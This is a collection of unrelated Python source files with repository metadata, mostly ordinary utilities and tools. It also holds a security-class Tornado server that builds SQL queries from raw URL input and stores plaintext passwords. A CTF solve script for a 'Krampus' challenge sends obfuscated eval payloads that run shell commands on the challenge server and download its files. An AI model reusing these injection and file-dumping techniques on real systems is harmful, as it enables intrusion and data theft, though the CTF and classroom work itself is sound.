| 42.939759 | 75 | 0.664516 | 1,209 | 10,692 | 5.459884 | 0.108354 | 0.112407 | 0.018331 | 0.02333 | 0.568247 | 0.499167 | 0.422663 | 0.349795 | 0.344645 | 0.319497 | 0 | 0.003544 | 0.261036 | 10,692 | 248 | 76 | 43.112903 | 0.83192 | 0.027965 | 0 | 0.346939 | 0 | 0 | 0.050523 | 0 | 0 | 0 | 0 | 0 | 0.112245 | 1 | 0.137755 | false | 0.112245 | 0.035714 | 0 | 0.234694 | 0.005102 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
77e901a7f8d4bc7381e7f0c1e50229660542c319 | 441 | py | Python | Pell_Sequence/pell.py | RayhanHagel/Sequence | 6781b0b1e82dbc3777ccb245a54b4afc50203582 | [
"MIT"
] | null | null | null | Pell_Sequence/pell.py | RayhanHagel/Sequence | 6781b0b1e82dbc3777ccb245a54b4afc50203582 | [
"MIT"
] | null | null | null | Pell_Sequence/pell.py | RayhanHagel/Sequence | 6781b0b1e82dbc3777ccb245a54b4afc50203582 | [
"MIT"
] | null | null | null | # Pell Numbers
class Pell:
def __init__(self):
self.limiter = 1000
self.numbers = [0, 1]
self.path = r'./Pell_Sequence/results.txt'
def void(self):
with open(self.path, "w+") as file:
for i in range(self.limiter):
self.numbers.append(2 * self.numbers[i+1] + self.numbers[i])
file.writelines(f'{self.numbers}\n')
Start = Pell()
Start.void()
| 23.210526 | 76 | 0.54195 | 58 | 441 | 4.034483 | 0.534483 | 0.235043 | 0.102564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02649 | 0.315193 | 441 | 19 | 77 | 23.210526 | 0.748344 | 0.027211 | 0 | 0 | 0 | 0 | 0.10514 | 0.063084 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77ea7aa4a3179db41bee8ed7f328c3a86b2411b8 | 2,179 | py | Python | modules/monte_carlo/bin/onramp_run.py | elise-baumgartner/onramp | beb3c807264fcb70d8069ff2e3990b0ce3f59912 | [
"BSD-3-Clause"
] | 2 | 2016-09-09T04:19:01.000Z | 2019-02-15T20:28:13.000Z | modules/monte_carlo/bin/onramp_run.py | elise-baumgartner/onramp | beb3c807264fcb70d8069ff2e3990b0ce3f59912 | [
"BSD-3-Clause"
] | 67 | 2016-06-02T19:37:56.000Z | 2018-02-22T05:23:45.000Z | modules/monte_carlo/bin/onramp_run.py | elise-baumgartner/onramp | beb3c807264fcb70d8069ff2e3990b0ce3f59912 | [
"BSD-3-Clause"
] | 9 | 2015-06-22T22:10:22.000Z | 2016-04-26T15:35:45.000Z | #!/usr/bin/env python
#
# Curriculum Module Run Script
# - Run once per run of the module by a user
# - Run inside job submission. So in an allocation.
# - onramp_run_params.cfg file is available in current working directory
#
import os
import sys
from subprocess import call
from configobj import ConfigObj
#
# Read the configobj values
#
# This will always be the name of the file, so fine to hardcode here
conf_file = "onramp_runparams.cfg"
# Already validated the file in our onramp_preprocess.py script - no need to do it again
config = ConfigObj(conf_file)
#
# Run my program
#
os.chdir('src')
# Retrive mode
mode = config['monte_carlo']['mode']
def default_case():
print mode + ' is not a recognized mode.\n'
print '+----------------------------+\n'
print '| mode | program |\n'
print '+----------------------------+\n'
print '| 1s | coin_flip_seq |\n'
print '| 1p | coin_flip_omp |\n'
print '| 2s | draw_four_suits_seq |\n'
print '| 2p | draw_four_suits_omp |\n'
print '| 3s | roulette_sim_seq |\n'
print '| 3p | roulette_sim_omp |\n'
print '+----------------------------+\n'
sys.exit(-1)
def coin_seq():
call(['mpirun', '-np', '1', 'coin_flip_seq'])
def coin_omp():
call(['mpirun', '-np', '1', 'coin_flip_omp', config['monte_carlo']['threads']])
def draw_seq():
call(['mpirun', '-np', '1', 'draw_four_suits_seq'])
def draw_omp():
call(['mpirun', '-np', '1', 'draw_four_suits_omp', config['monte_carlo']['threads']])
def roulette_seq():
call(['mpirun', '-np', '1', 'roulette_sim_seq'])
def roulette_omp():
call(['mpirun', '-np', '1', 'roulette_sim_omp', config['monte_carlo']['threads']])
def pi_seq():
call(['mpirun', '-np', '1', 'pi_seq', config['monte_carlo']['pi_trials']])
def pi_omp():
call(['mpirun', '-np', '1', 'pi_omp', config['monte_carlo']['pi_trials'], config['monte_carlo']['threads']])
executables = { '1s' : coin_seq, '1p' : coin_omp, '2s' : draw_seq, '2p' : draw_omp, '3s' : roulette_seq, '3p' : roulette_omp, '4s' : pi_seq, '4p' : pi_omp}
executables.get(mode, default_case)()
# Exit 0 if all is ok
sys.exit(0)
| 29.445946 | 155 | 0.607159 | 312 | 2,179 | 4.038462 | 0.342949 | 0.047619 | 0.07619 | 0.08254 | 0.262698 | 0.181746 | 0.04127 | 0 | 0 | 0 | 0 | 0.014077 | 0.184947 | 2,179 | 73 | 156 | 29.849315 | 0.695383 | 0.202386 | 0 | 0.075 | 0 | 0 | 0.407902 | 0.055782 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0.275 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77f0db72d836ba6b97019e6f581d5a3c55af879a | 1,347 | py | Python | contrib/tools/templates/extensions/extension/extension.py | Khan/reviewboard | 51ec4261e67b8bf4e2cfa9a0894a97b16509ad33 | [
"MIT"
] | 1 | 2015-09-11T15:50:17.000Z | 2015-09-11T15:50:17.000Z | contrib/tools/templates/extensions/extension/extension.py | Khan/reviewboard | 51ec4261e67b8bf4e2cfa9a0894a97b16509ad33 | [
"MIT"
] | null | null | null | contrib/tools/templates/extensions/extension/extension.py | Khan/reviewboard | 51ec4261e67b8bf4e2cfa9a0894a97b16509ad33 | [
"MIT"
] | null | null | null | # {{extension_name}} Extension for Review Board.
from django.conf import settings
from django.conf.urls.defaults import patterns, include
from reviewboard.extensions.base import Extension
{%- if dashboard_link is not none %}
from reviewboard.extensions.hooks import DashboardHook, URLHook
{% endif %}
{%- if dashboard_link is not none %}
class {{class_name}}URLHook(URLHook):
def __init__(self, extension, *args, **kwargs):
pattern = patterns('', (r'^{{package_name}}/',
include('{{package_name}}.urls')))
super({{class_name}}URLHook, self).__init__(extension, pattern)
class {{class_name}}DashboardHook(DashboardHook):
def __init__(self, extension, *args, **kwargs):
entries = [{
'label': '{{dashboard_link}}',
'url': settings.SITE_ROOT + '{{package_name}}/',
}]
super({{class_name}}DashboardHook, self).__init__(extension,
entries=entries, *args, **kwargs)
{%- endif %}
class {{class_name}}(Extension):
{%- if is_configurable %}
is_configurable = True
{%- endif %}
def __init__(self, *args, **kwargs):
super({{class_name}}, self).__init__()
{%- if dashboard_link is not none %}
self.url_hook = {{class_name}}URLHook(self)
self.dashboard_hook = {{class_name}}DashboardHook(self)
{%- endif %}
| 34.538462 | 71 | 0.643653 | 148 | 1,347 | 5.554054 | 0.304054 | 0.087591 | 0.054745 | 0.062044 | 0.160584 | 0.160584 | 0 | 0 | 0 | 0 | 0 | 0 | 0.199703 | 1,347 | 38 | 72 | 35.447368 | 0.762523 | 0.03415 | 0 | 0.258065 | 0 | 0 | 0.063174 | 0.016179 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.129032 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77f72a150ddbff6751f16b9d1519dfdf8b8451e6 | 1,095 | py | Python | src/algo/api_nfdomains.py | jumperavocado/staketaxcsv | 5e1b0420b7897f35e70d10f385c9e9e972f70560 | [
"MIT"
] | 140 | 2021-12-11T23:37:46.000Z | 2022-03-29T23:04:36.000Z | src/algo/api_nfdomains.py | jumperavocado/staketaxcsv | 5e1b0420b7897f35e70d10f385c9e9e972f70560 | [
"MIT"
] | 80 | 2021-12-17T15:13:47.000Z | 2022-03-31T13:33:53.000Z | src/algo/api_nfdomains.py | hodgerpodger/staketaxcsv | d341fc8e54225aafd5401e89daaf9b71cdb1e1a4 | [
"MIT"
] | 52 | 2021-12-12T00:37:17.000Z | 2022-03-29T23:25:09.000Z | import logging
import requests
from settings_csv import ALGO_NFDOMAINS
# API documentation: https://editor.swagger.io/?url=https://api.testnet.nf.domains/info/openapi3.yaml
class NFDomainsAPI:
session = requests.Session()
def get_address(self, name):
endpoint = f"nfd/{name}"
params = {"view": "brief"}
data, status_code = self._query(ALGO_NFDOMAINS, endpoint, params)
if status_code == 200:
# https://docs.nf.domains/docs/faq#how-do-i-set-my-address-to-resolve-my-nfd
# If present, use the primary/deposit address, otherwise resolve to the owner address
if "caAlgo" in data:
return data["caAlgo"][0]
else:
return data["owner"]
else:
return None
def _query(self, base_url, endpoint, params=None):
logging.info("Querying NFDomains endpoint %s...", endpoint)
url = f"{base_url}/{endpoint}"
response = self.session.get(url, params=params)
return response.json(), response.status_code
| 34.21875 | 102 | 0.612785 | 132 | 1,095 | 5 | 0.515152 | 0.045455 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006274 | 0.272146 | 1,095 | 31 | 103 | 35.322581 | 0.821832 | 0.234703 | 0 | 0.095238 | 0 | 0 | 0.112219 | 0.026185 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.142857 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
77f88ac50cfbfdde1e9224491dcbf265368f1fab | 5,720 | py | Python | gant/main.py | kshlm/gant | eabaa17ebfd31b1654ee1f27e7026f6d7b370609 | [
"BSD-2-Clause"
] | null | null | null | gant/main.py | kshlm/gant | eabaa17ebfd31b1654ee1f27e7026f6d7b370609 | [
"BSD-2-Clause"
] | null | null | null | gant/main.py | kshlm/gant | eabaa17ebfd31b1654ee1f27e7026f6d7b370609 | [
"BSD-2-Clause"
] | null | null | null | #! /usr/bin/env python
from __future__ import unicode_literals, print_function
from .utils.gant_ctx import GantCtx
import os
import click
helpStr = """
Gant : The Gluster helper ant
Creates GlusterFS development and testing environments using Docker
Usage:
gant [options] build-base [force]
gant [options] build-main <srcdir>[force]
gant [options] launch <number> [force]
gant [options] stop [<name>] [force]
gant [options] info
gant [options] ssh <name> [--] [<ssh-command>...]
gant [options] ip <name>
gant [options] gluster <name> [--] [<gluster-command>...]
Commands:
build-base Builds the base docker image
build-main Builds the main docker image to be used for launching
containers
launch Launches the given number of containers
stop Stops the launched containers
info Gives information about the gant environment
ssh SSHes into the named container and runs the command if given
ip Gives IP address of the named container
gluster Runs given gluster CLI command in named container
Arguments:
force Forcefully do the operation
<srcdir> Directory containing the GlusterFS source
<number> Number of containers to launch
<name> Name of container to stop
<ssh-command> Command to run inside the container
<gluster-command> Gluster CLI command to run inside the container
Options:
-c <conffile>, --conf <conffile> Configuration file to use
--basetag <basetag> Tag to be used for the base docker image
[default: glusterbase:latest]
--maintag <maintag> Tag to be used for the main docker image
[default: gluster:latest]
--basedir <basedir> Base directory containing the Dockerfile
and helper scripts for Gant
[default: {0}]
--prefix <prefix> Prefix to be used for naming the
launched docker containers
[default: gluster]
-V, --verbose Verbose output
""".format(os.getcwd())
@click.group(no_args_is_help=True)
@click.option("-c", "--conf", type=click.File(),
help="Configuration file to use")
@click.option("--basedir", default=os.getcwd(),
type=click.Path(exists=True, file_okay=False, readable=True),
help="Directory containing the Dockerfile and helper scripts "
"for GAnt")
@click.option("--basetag", default="glusterbase:latest", show_default=True,
help="Tag to be used for the base docker image")
@click.option("--maintag", default="gluster:latest", show_default=True,
help="Tag to be used for the main docker image")
@click.option("--prefix", default="gluster", show_default=True,
help="Prefix used for naming launched containers")
@click.option("--verbose", "-v", count=True, metavar="",
help="Increase verbosity of output")
@click.version_option(prog_name='GAnt')
@click.pass_context
def gant(ctx, conf, basedir, basetag, maintag, prefix, verbose):
"""
GAnt : The Gluster helper ant\n
Creates GlusterFS development and testing environments using Docker
"""
ctx.obj.initConf(basetag, maintag, basedir, prefix, verbose)
ctx.obj.gd.setConf(ctx.obj.conf)
@gant.command(name="build-base", help="Build the base docker image")
@click.option("--force", is_flag=True, default=False,
help="Forcefully do the operation")
@click.pass_context
def build_base(ctx, force):
ctx.obj.gd.build_base_image_cmd(force)
@gant.command(name="build-main",
help="Build the main docker image to be used for launching")
@click.option("--force", is_flag=True, default=False,
help="Forcefully do the operation")
@click.argument("srcdir",
type=click.Path(exists=True, file_okay=False, readable=True))
@click.pass_context
def build_main(ctx, srcdir, force):
ctx.obj.gd.build_main_image_cmd(srcdir, force)
@gant.command(help="Launch the given number of containers")
@click.option("--force", is_flag=True, default=False,
help="Forcefully do the operation")
@click.argument("number", type=click.INT)
@click.pass_context
def launch(ctx, number, force):
ctx.obj.gd.launch_cmd(number, force)
@gant.command(help="Stop the launched containers")
@click.option("--force", is_flag=True, default=False,
help="Forcefully do the operation")
@click.argument("name", required=False, type=click.STRING)
@click.pass_context
def stop(ctx, name, force):
ctx.obj.gd.stop_cmd(name, force)
@gant.command(help="Show information about the GAnt environment")
@click.pass_context
def info(ctx):
ctx.obj.gd.info_cmd()
@gant.command(help="Print ip of given container")
@click.argument("container", type=click.STRING)
@click.pass_context
def ip(ctx, container):
ctx.obj.gd.ip_cmd(container)
@gant.command(help="SSHes into named container and runs command if given")
@click.argument("container", type=click.STRING)
@click.argument("command", required=False, type=click.STRING, nargs=-1)
@click.pass_context
def ssh(ctx, container, command):
ctx.obj.gd.ssh_cmd(container, command)
@gant.command(help="Runs given gluster command in named container")
@click.argument("container", type=click.STRING)
@click.argument("command", type=click.STRING, nargs=-1)
def gluster(ctx, container, command):
ctx.obj.gd.gluster_cmd(container, command)
def main():
gant(obj=GantCtx())
| 37.631579 | 78 | 0.658217 | 733 | 5,720 | 5.077763 | 0.190996 | 0.017732 | 0.019344 | 0.040838 | 0.423428 | 0.34202 | 0.3036 | 0.290704 | 0.242343 | 0.136486 | 0 | 0.00068 | 0.229196 | 5,720 | 151 | 79 | 37.880795 | 0.843502 | 0.020979 | 0 | 0.161017 | 0 | 0 | 0.535401 | 0.003943 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084746 | false | 0.067797 | 0.033898 | 0 | 0.118644 | 0.008475 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
77fa574079bff2cba7f0267eea287e361d42b7f6 | 6,945 | py | Python | csse290-server/mainserver.py | RHIT-CSSE/SecurityClub | ee7fa1846f83a41e3503b81eaf0b32e63642abd2 | [
"MIT"
] | null | null | null | csse290-server/mainserver.py | RHIT-CSSE/SecurityClub | ee7fa1846f83a41e3503b81eaf0b32e63642abd2 | [
"MIT"
] | 1 | 2017-05-28T03:04:12.000Z | 2017-05-28T03:04:12.000Z | csse290-server/mainserver.py | RHIT-CSSE/SecurityClub | ee7fa1846f83a41e3503b81eaf0b32e63642abd2 | [
"MIT"
] | null | null | null | # Author: Ishank Tandon
# Date: January 29, 2017
import tornado.ioloop
import tornado.web
import tornado.httpserver
import hashlib
import base64
import json
import mysql.connector as sql
dbuser = 'csse'
# Register a new user
class UserHandler(tornado.web.RequestHandler):
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Headers", "x-requested-with")
self.set_header('Access-Control-Allow-Methods', 'POST, GET')
self.set_header('Cache-Control', 'max-age=0,must-revalidate')
def post(self, username, password, person_name):
db = sql.connect(user=dbuser, database='wireshark', host='127.0.0.1')
cursor = db.cursor(buffered=True)
checkquery = "SELECT * FROM userinfo WHERE username = '" + username + "'"
insertquery = "INSERT INTO userinfo(username, password, person_name) VALUES('" + username + "', '" + password + "', '" + person_name + "')"
selectquery = "SELECT id FROM userinfo WHERE username = '" + username + "'"
try:
# import pdb; pdb.set_trace()
cursor.execute(checkquery)
res = cursor.fetchone()
if res is None:
cursor.execute(insertquery)
db.commit()
cursor.execute(selectquery)
idd = cursor.fetchone()[0]
print(idd)
resobj = {'id': idd}
db.commit()
self.write({ 'result': True, 'messsage': 'Successfully created user', 'data' : resobj})
else:
db.commit()
resobj = {'id': -1 }
self.write({ 'result': False, 'messsage': 'User already exists', 'data' : resobj})
except sql.Error as err:
db.rollback()
self.write({'result': False, 'message': 'Some weird error occured' })
db.close()
def get(self, username, password):
db = sql.connect(user=dbuser, database='wireshark', host='127.0.0.1')
cursor = db.cursor(buffered=True)
query = "SELECT * FROM userinfo WHERE username='" + username + "' " + "AND password='" + password + "'"
print(query)
try:
cursor.execute(query)
res = cursor.fetchone()
db.commit()
if res != None:
resobj = {'id': res[3]}
self.write({ 'result': True, 'message': 'Successfully logged in', 'data': resobj })
else:
resobj = {'id': -1 }
self.write({ 'result': False, 'message': 'Couldnt logged in. error.', 'data': resobj })
except sql.Error as err:
db.rollback()
self.write({'result': False, 'message': 'Some weird error occured' })
db.close()
# Post a new message
class MessageHandler(tornado.web.RequestHandler):
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Headers", "x-requested-with")
self.set_header('Access-Control-Allow-Methods', 'POST, GET')
self.set_header('Cache-Control', 'max-age=0,must-revalidate')
def post(self, uid, message):
db = sql.connect(user=dbuser, database='wireshark', host='127.0.0.1')
cursor = db.cursor(buffered=True)
selectquery = "SELECT username, password, person_name FROM userinfo WHERE id = '" + uid + "'"
print(selectquery)
try:
cursor.execute(selectquery)
name = cursor.fetchone()
print(name)
if name is not None:
insertquery = "INSERT INTO posts(person_name, id, message) VALUES('" + name[2] + "', '" + uid + "', '" + message + "')"
cursor.execute(insertquery)
db.commit()
resobj = { 'username': name[0], 'password': name[1] }
self.write({ 'result': True, 'messsage': 'Successfully created post', 'data': resobj })
else:
db.commit()
self.write({ 'result': False, 'messsage': 'wrong id breh!!' })
except sql.Error as err:
db.rollback()
self.write({'result': False, 'message': 'Some weird error occured' })
db.close()
def get(self):
# print(username)
# print(uid)
db = sql.connect(user=dbuser, database='wireshark', host='127.0.0.1')
cursor = db.cursor(buffered=True)
query = "SELECT * FROM posts LIMIT 20"
print(query)
try:
cursor.execute(query)
res = cursor.fetchall()
retobj = []
for item in res:
data = { 'person_name': item[0], 'post': item[2] }
retobj.append(data)
# resobj = {'username': res[0], 'id': res[3]}
db.commit()
if res != None:
self.write({ 'result': True, 'message': 'Got these posts.', 'data': retobj })
else:
self.write({ 'result': False, 'message': 'Couldnt logged in. error.' })
except sql.Error as err:
db.rollback()
self.write({'result': False, 'message': 'Some weird error occured' })
db.close()
class ProxyMainHandler(tornado.web.RequestHandler):
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Headers", "x-requested-with")
self.set_header('Access-Control-Allow-Methods', 'POST, GET')
def get(self, numb):
print('input was: ' + numb)
num = int(numb)
if num == 47:
decodedmsg = 'It is a period of civil war. Rebel spaceships, striking from a hidden base, have won their first victory against the evil Galactic Empire.\nDuring the battle, Rebel spies managed to steal secret plans to the Empire\'s ultimate weapon, the DEATH STAR, an armored space station with enough power to destroy an entire planet.\nPursued by the Empire\'s sinister agents, Princess Leia races home aboard her starship, custodian of the stolen plans that can save her people and restore freedom to the galaxy....'
msg = base64.b64encode(decodedmsg)
self.write({ "result": True, "key": msg })
else:
msg = base64.b64encode('Not the secret buddy! Haha try again!')
self.write({ "result": False, "key": msg })
class SharkHandler(tornado.web.RequestHandler):
def get(self):
self.render('sharkclient.html')
class ProxyHandler(tornado.web.RequestHandler):
def get(self):
self.render('client.html')
class ClubHandler(tornado.web.RequestHandler):
def get(self):
self.add_header('CSSE290_CLASS', 'Nu! Lbh znqr vg guvf sne. Jryy, gurerf abguvat zber. Gur frperg vf: v nz njrfbzr.')
self.render('webactivity.html')
def make_app():
return tornado.web.Application([
(r"/shark", SharkHandler),
(r"/shark/signup/username/([^/]*)/password/([^/]*)/person_name/([^/]*)", UserHandler),
(r"/shark/login/username/([^/]*)/password/([^/]*)", UserHandler),
(r"/shark/message/id/([^/]*)/message/([^/]*)", MessageHandler),
(r"/shark/message/get20", MessageHandler),
(r"/proxy", ProxyHandler),
(r"/webactivity", ClubHandler),
(r"/proxy/([^/]*)", ProxyMainHandler),
])
if __name__ == "__main__":
app = tornado.httpserver.HTTPServer(make_app())
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
| 34.552239 | 531 | 0.629662 | 852 | 6,945 | 5.089202 | 0.288732 | 0.029059 | 0.048432 | 0.039437 | 0.492389 | 0.429889 | 0.414207 | 0.375461 | 0.336716 | 0.315037 | 0 | 0.012055 | 0.211663 | 6,945 | 200 | 532 | 34.725 | 0.779909 | 0.026206 | 0 | 0.486486 | 0 | 0.02027 | 0.316452 | 0.067081 | 0.006757 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0.054054 | 0.047297 | 0.006757 | 0.175676 | 0.040541 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
77fba3bfdbce870f9968213b129911ed635849bf | 368 | py | Python | 01_Language/01_Functions/python/preg_replace_callback.py | cliff363825/TwentyFour | 09df59bd5d275e66463e343647f46027397d1233 | [
"MIT"
] | 3 | 2020-06-28T07:42:51.000Z | 2021-01-15T10:32:11.000Z | 01_Language/01_Functions/python/preg_replace_callback.py | cliff363825/TwentyFour | 09df59bd5d275e66463e343647f46027397d1233 | [
"MIT"
] | 9 | 2021-03-10T22:45:40.000Z | 2022-02-27T06:53:20.000Z | 01_Language/01_Functions/python/preg_replace_callback.py | cliff363825/TwentyFour | 09df59bd5d275e66463e343647f46027397d1233 | [
"MIT"
] | 1 | 2021-01-15T10:51:24.000Z | 2021-01-15T10:51:24.000Z | # coding: utf-8
import re
def preg_replace_callback(pattern, callback, subject):
return re.sub(pattern, callback, subject)
if __name__ == '__main__':
text = 'April fools day is 04/01/2002\n' + \
'Last christmas was 12/24/2001\n'
print(preg_replace_callback(r'(\d{2}/\d{2}/)(\d{4})', lambda m: m.group(1) + str(int(m.group(2)) + 1), text))
| 24.533333 | 113 | 0.633152 | 60 | 368 | 3.683333 | 0.7 | 0.099548 | 0.171946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076667 | 0.184783 | 368 | 14 | 114 | 26.285714 | 0.66 | 0.035326 | 0 | 0 | 0 | 0 | 0.25779 | 0.05949 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0.142857 | 0.428571 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
77fbaffe827fd494fe1d8b83ddeadea0590d53bf | 2,096 | py | Python | XMAS2018/Krampus/solve.py | flawwan/CTF-Writeups | ee1741f91b869ece5e5a8335935213ac45c015a4 | [
"MIT"
] | 27 | 2018-10-08T13:12:54.000Z | 2021-11-05T13:28:03.000Z | XMAS2018/Krampus/solve.py | flawwan/CTF-Writeups | ee1741f91b869ece5e5a8335935213ac45c015a4 | [
"MIT"
] | 3 | 2018-12-22T21:34:53.000Z | 2019-02-09T10:25:41.000Z | XMAS2018/Krampus/solve.py | flawwan/CTF-Writeups | ee1741f91b869ece5e5a8335935213ac45c015a4 | [
"MIT"
] | 7 | 2018-10-09T03:46:12.000Z | 2021-05-23T17:40:19.000Z | python
from pwn import *
import base64
import sys
def convertstr(convert, debug=False):
if debug:
print convert
output = ""
for i in convert:
output+= "chr(%d)+" % ord(i)
return output[:-1]
if len(sys.argv) == 2 and sys.argv[1] == "local":
r = remote("0.0.0.0",2000)
else:
r = remote("199.247.6.180",14000)
for i in range(5):
r.readuntil("<You>:")
r.sendline("1")
def dump():
payload_search = convertstr("__import__('os').system('find -follow')")
r.sendline("eval(%s)"%payload_search)
r.readuntil("Krampus>: ")
skip = ["./server.jar"]
lines = r.readuntil("You>: ")[:-10].splitlines()
print "Found %d files" % len(lines)
for f in lines:
print "Downloading file %s" % f
if f in skip:
print "Banned file... Skipping"
continue
if os.path.isfile("./minecraft/%s" % f):
print "File already downloaded..."
continue
payloadchunksize = convertstr("__import__('os').system('cat ./%s | base64 -w 0 | wc -c')" % f)
r.sendline("eval(%s)"%payloadchunksize)
r.readuntil("Krampus>: ")
chunk_size = (r.readuntil("You>: ")[:-9])
print "SIZE: %s" % chunk_size
if "Krampus stares back" in chunk_size:
print "Found directory..."
dirpath = "./minecraft/%s" % f
if not os.path.exists(dirpath):
os.mkdir(dirpath)
print "Directory created"
continue
else:
chunk_size = int(chunk_size)
#This is the ugliest code i have ever seen. That's right. I wonder who wrote it
chunk_ = range(1, chunk_size+1)
n = 50000
output = [chunk_[i:i+n] for i in range(0, len(chunk_), n)]
print "Size of file is %d lines" % chunk_size
counter = 1
data = ""
for i in output:
diff = (i[-1]-i[0])+1
print "Processing chunk [%d of %d]" % (counter,chunk_size)
high = counter+diff
payload = convertstr("__import__('os').system('cat %s | base64 -w 0 | cut -c%d-%d && echo stop')" % (f, counter,high))
counter += diff+1
r.sendline("eval(%s)" % payload)
r.readuntil("Krampus>: ")
data += r.readuntil("stop")[:-5]
data = base64.b64decode(data)
with open('minecraft/%s' % f, 'w') as the_file:
the_file.write(data)
dump()
r.close | 27.946667 | 121 | 0.632634 | 322 | 2,096 | 4.034161 | 0.369565 | 0.055427 | 0.018476 | 0.055427 | 0.08776 | 0.055427 | 0.055427 | 0.055427 | 0.055427 | 0 | 0 | 0.033294 | 0.183206 | 2,096 | 75 | 122 | 27.946667 | 0.725467 | 0.037214 | 0 | 0.119403 | 0 | 0.014925 | 0.261645 | 0.042121 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.089552 | null | null | 0.149254 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77fc085d04b7709e22eb732bec617f5d06b34521 | 1,304 | py | Python | oxasl_ve/veaslc_cli_wrapper.py | ibme-qubic/oxasl_ve | 51f0701573876042a7fc5f1b91c5085600c6e3c3 | [
"Apache-2.0"
] | 1 | 2021-01-20T12:06:31.000Z | 2021-01-20T12:06:31.000Z | oxasl_ve/veaslc_cli_wrapper.py | physimals/oxasl_ve | f56ea316fddf8b59216a5df7a557bf0c3ea6972b | [
"Apache-2.0"
] | null | null | null | oxasl_ve/veaslc_cli_wrapper.py | physimals/oxasl_ve | f56ea316fddf8b59216a5df7a557bf0c3ea6972b | [
"Apache-2.0"
] | null | null | null | from fsl.wrappers import LOAD
from oxasl_ve.wrappers import veaslc
def veaslc_wrapper(wsp, data, roi):
"""
"""
# Run the C code
ret = veaslc(data, roi, out=LOAD,
diff=wsp.iaf == "vediff",
method=wsp.ifnone("veasl_method", "map"),
veslocs=wsp.veslocs,
imlist="T0123456", # FIXME
encdef=wsp.enc_mac,
modmat=wsp.modmat,
nfpc=wsp.nfpc,
inferloc=wsp.infer_loc,
inferv=wsp.ifnone("infer_v", False),
xystd=wsp.ifnone("xy_std", 1),
rotstd=wsp.ifnone("rot_std", 1.2),
vmean=wsp.ifnone("v_mean", 0.3),
vstd=wsp.ifnone("v_std", 0.01),
njumps=wsp.ifnone("num_jumps", 500),
burnin=wsp.ifnone("burnin", 10),
sampleevery=wsp.ifnone("sample_every", 1),
debug=wsp.ifnone("debug", False),
log=wsp.fsllog)
flow = ret["out/flow"]
prob = ret["out/vessel_prob"]
extras = {
"pis" : ret["out/pis"],
"x" : ret["out/x"],
"y" : ret["out/y"],
"trans" : ret.get("out/trans", None),
}
log = ret["out/logfile"]
return flow, prob, extras, log
